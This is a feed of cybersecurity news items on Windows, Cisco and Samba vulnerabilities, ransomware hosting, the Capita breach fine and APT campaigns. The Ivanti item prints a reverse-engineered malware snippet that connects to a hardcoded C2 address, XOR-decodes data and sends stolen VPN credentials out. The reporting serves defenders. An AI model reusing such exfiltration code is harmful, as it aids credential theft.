-
Scaling the SOC with AI – Why now? Security Operations Centers (SOCs) are under unprecedented pressure. According to SACR’s AI-SOC Market Landscape 2025, the average organization now faces around 960 alerts per day, while large enterprises manage more than 3,000 alerts daily from an average of 28 different tools. Nearly 40% of those alerts go uninvestigated, and 61% of security teams admit
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
-
CISA has added a critical Microsoft Windows vulnerability to its Known Exploited Vulnerabilities catalog, warning organizations that threat actors are actively exploiting it in real-world attacks.
Identified as CVE-2025-59230, the flaw stems from improper access control in the Windows Remote Access Connection Manager service.
This local privilege escalation vulnerability allows an authorized user, such as someone with initial system access, to gain higher-level permissions, potentially compromising entire networks.
Microsoft disclosed the issue in a recent security update, confirming that it affects multiple versions of Windows, including Windows 10, 11, and Server editions.
The vulnerability, classified under CWE-284 for improper access control, doesn’t require sophisticated remote hacking skills; instead, it exploits weaknesses in how the system handles remote access connections.
Security researchers note that once exploited, attackers can manipulate system files, install malware, or pivot to other machines on the network.
While it’s not yet confirmed for use in ransomware campaigns, experts caution that its simplicity makes it a prime target for cybercriminals seeking initial footholds.
CISA’s alert, released on October 15, 2025, emphasizes that federal agencies must patch the vulnerability by November 5 or face compliance risks under Binding Operational Directive 22-01.
“Organizations ignoring patches expose themselves to privilege escalation chains that could lead to data breaches or lateral movement.”
The vulnerability’s severity is underscored by its CVSS v3.1 base score of 7.8, rated high due to the ease of local exploitation and potential for complete system takeover.
Affected components include the RasMan service, which manages VPN and dial-up connections. Microsoft has released patches via its October 2025 Patch Tuesday updates, urging immediate deployment.
For cloud-based Windows instances, CISA recommends aligning with BOD 22-01 guidelines to secure virtual environments.
Mitigations
To counter the threat, IT administrators should prioritize applying Microsoft’s security updates, disabling unnecessary Remote Access services if not in use, and implementing least-privilege access controls.
Tools like Microsoft Defender for Endpoint can help detect exploitation attempts through behavioral monitoring.
If patches aren’t feasible, such as on air-gapped systems, CISA advises isolating affected machines or discontinuing the vulnerable product altogether.
As cyber threats evolve, this incident highlights the importance of timely patching in Windows ecosystems. With exploitation ongoing, unpatched systems remain a ticking time bomb for enterprises worldwide.
Follow us on Google News, LinkedIn, and X for daily cybersecurity updates. Contact us to feature your stories.
The post CISA Warns Of Windows Improper Access Control Vulnerability Exploited In Attacks appeared first on Cyber Security News.
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
-
Cybersecurity researchers have disclosed details of a new campaign that exploited a recently disclosed security flaw impacting Cisco IOS Software and IOS XE Software to deploy Linux rootkits on older, unprotected systems. The activity, codenamed Operation Zero Disco by Trend Micro, involves the weaponization of CVE-2025-20352 (CVSS score: 7.7), a stack overflow vulnerability in the Simple
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
-
An aggressive SEO poisoning campaign has surfaced in early October 2025, preying on users searching for the legitimate Ivanti Pulse Secure VPN client.
Attackers have registered lookalike domains such as
ivanti-pulsesecure.comandivanti-secure-access.orgto host trojanized installers that appear official.Unsuspecting victims clicking on top search results are redirected to these malicious sites, where a signed MSI file is offered for download under the guise of Ivanti’s Secure Access Client.
The trojanized installer carries a credential-stealing DLL, designed to harvest saved VPN connection details and exfiltrate them to a C2 server hosted on Microsoft Azure infrastructure.
.webp)
Example of Bing search results with a poisoned website (Source – Zscaler) Zscaler researchers noted a sophisticated referrer-based content delivery tactic used by the phishing domains. When accessed directly in a browser, the sites display benign content without any download links, evading quick detection by analysts and security scanners.
Only users arriving via search engine referrals—particularly from Bing—are shown the malicious download button, exploiting the HTTP Referrer header to cloak the true intent of the pages.
Once downloaded, the MSI installer drops two malicious DLLs—
dwmapi.dllandpulseextension.dll—signed by a legitimate certificate authority to further bypass security controls..webp)
The threat actor’s fake Ivanti Pulse Secure download website (Source – Zscaler) These DLLs embed a sequence of routines to locate and parse the Ivanti connection store (
connectionstore.dat), extracting saved URIs and credentials.Delving into the infection mechanism reveals how the malware establishes persistence and stealth. Upon execution, the trojanized DLL initiates a network handshake with a hardcoded IP address in the Azure range (4.239.95.1) on port 8080.
The following C code snippet illustrates the socket setup and data exchange routine:-
WSADATA was; WSAStartup(MAKEWORD(2,2), &wsa); int sock = socket(AF_INET, SOCK_STREAM, 0); struct sockaddr_in addr = {0}; addr.sin_family = AF_INET; addr.sin_port = htons(8080); inet_pton(AF_INET, "4.239.95.1", &addr.sin_addr); connect(sock, (struct sockaddr*)&addr, sizeof(addr)); // Receive 48 bytes recv(sock, buf, 0x30, 0); // XOR deobfuscation for(int i=0;i<0x30;i++) buf[i]^=key[i]; // Send 52-byte obfuscated payload send(sock, buf, 0x34, 0);.webp)
Reverse-engineered code showing network communication logic (Source – Zscaler) After the initial handshake and XOR-based deobfuscation routine, the malware transmits stolen VPN credentials in an HTTP POST request to the path
/incomeshit, a colloquial label for exfiltration channels.Because the IP resides within Microsoft Azure’s range, security teams may overlook these connections as benign cloud traffic.
By masquerading as trusted software and incorporating advanced evasion techniques, this campaign demonstrates the potency of search engine poisoning as an initial access vector.
Organizations should validate any Ivanti installer checksums, monitor outbound connections to unfamiliar Azure IPs on port 8080, and educate users on verifying official download sources.
Continuous threat hunting for referrer-based anomalies remains essential to thwarting these stealthy attacks.
Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.
The post Beware of Malicious Ivanti VPN Client Sites in Google Search That Delivers Malware appeared first on Cyber Security News.
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
-
Qilin ransomware–an increasingly prolific ransomware-as-a-service (RaaS) operation–has intensified its global extortion campaigns by exploiting a covert network of bulletproof hosting (BPH) providers. These rogue hosting services, often headquartered in secrecy-friendly jurisdictions and operated through labyrinthine shell-company structures, allow Qilin’s operators and affiliates to host malware, data leak sites, and command-and-control infrastructure with near impunity. In […]
The post Qilin Ransomware Leverages Ghost Bulletproof Hosting for Global Attacks appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
-
A newly disclosed vulnerability in Samba’s WINS server hook script enables unauthenticated attackers to run arbitrary commands on affected domain controllers. This critical flaw, tracked as CVE-2025-10230, carries a maximum CVSSv3.1 score of 10.0, reflecting its ease of exploitation and devastating impact on confidentiality, integrity, and availability. Overview of the Vulnerability The issue arises when […]
The post Critical Samba Flaw Allows Remote Attackers to Execute Arbitrary Code appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
-
The UK’s Information Commissioner’s Office (ICO) has imposed a £14 million fine on outsourcing giant Capita following a major cyber attack in 2023 that exposed the personal data of 6.6 million individuals.
This penalty, split as £8 million to Capita plc and £6 million to Capita Pension Solutions Limited, marks one of the largest data protection fines in recent UK history.
The breach highlighted critical shortcomings in corporate cybersecurity, affecting pension schemes and sensitive personal information across hundreds of organizations.
The incident unfolded on March 22, 2023, when an employee unwittingly downloaded a malicious file onto a company device, granting hackers initial access to Capita’s network.
Despite a high-priority security alert triggering within 10 minutes and some automated responses activating, Capita failed to isolate the infected device for 58 hours, far exceeding their one-hour target response time.
This delay allowed the attackers to deploy malware, escalate privileges, and move laterally across systems, exfiltrating nearly one terabyte of data between March 29 and 30.
By March 31, ransomware was deployed, resetting user passwords and locking Capita staff out of their systems, which disrupted services for clients, including local councils, the NHS, and pension providers.
Capita Data Breach Exposes Sensitive Data
The stolen data encompassed pension records, staff details, and customer information from over 600 organizations, with 325 pension schemes directly impacted.
Sensitive elements included financial data, criminal records, and special category information such as health or ethnic details for some victims.
The ICO received at least 93 complaints from affected individuals reporting anxiety and stress over potential identity theft and fraud.
The ICO’s probe uncovered multiple failures in Capita’s data protection practices, violating UK GDPR requirements for secure processing.
Notably, Capita lacked a tiered administrative account model, enabling easy privilege escalation and unauthorized network traversal vulnerabilities flagged in prior assessments but unaddressed.
Their Security Operations Centre was chronically understaffed, consistently missing response targets for alerts in the months leading up to the attack.
Additionally, critical systems handling millions of records underwent penetration testing only at commissioning, with no follow-ups, and findings remained siloed within business units rather than organization-wide.
These lapses left vast amounts of personal data exposed to significant risk, amplifying the breach’s scale.
Information Commissioner John Edwards emphasized that “Capita failed in its duty to protect the data entrusted to it by millions of people,” underscoring the preventable nature of the incident through basic measures like the principle of least privilege and timely alert responses.
Originally facing a £45 million provisional fine, Capita negotiated it down to £14 million via a voluntary settlement, admitting liability without appeal.
Capita offered 12 months of free credit monitoring to affected individuals through Experian, with over 260,000 activations, and established a dedicated support hotline.
CEO Adolfo Hernandez acknowledged the event as part of a wave of attacks on UK firms, reaffirming commitments to data security for public and private sector clients.
The ICO urged organizations to follow NCSC guidance on preventing lateral movement, conduct regular risk assessments, and prioritize security staffing.
With ongoing legal actions from victims, Capita’s total costs may yet rise, emphasizing accountability in an era of escalating ransomware threats.
Follow us on Google News, LinkedIn, and X for daily cybersecurity updates. Contact us to feature your stories.
The post Capita To pay £14 Million For Data Breach Exposes 6.6 Million Users Personal Data appeared first on Cyber Security News.
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
-
Penetration testing helps organizations ensure IT systems are secure, but it should never be treated in a one-size-fits-all approach. Traditional approaches can be rigid and cost your organization time and money – while producing inferior results. The benefits of pen testing are clear. By empowering “white hat” hackers to attempt to breach your system using similar tools and techniques to
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
-
The UK’s Information Commissioner’s Office has imposed a £14 million penalty on Capita following a major cyber attack in March 2023 that exposed the personal information of 6.6 million people. The fine was split between Capita plc, which received £8 million, and its subsidiary Capita Pension Solutions Limited, which was fined £6 million. The breach […]
The post Capita Fined £14 Million After Data Breach Exposes 6.6 Million Users appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
-
In a recently uncovered campaign, the Mysterious Elephant advanced persistent threat (APT) group has executed a sophisticated series of intrusions against government and foreign policy agencies across the Asia-Pacific region. The latest operations, active since early 2025, rely on custom-built malware modules and modified open-source utilities to target and siphon off documents, images, and archives […]
The post Mysterious Elephant APT Breach: Hackers Infiltrate Organization to Steal Sensitive Data appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
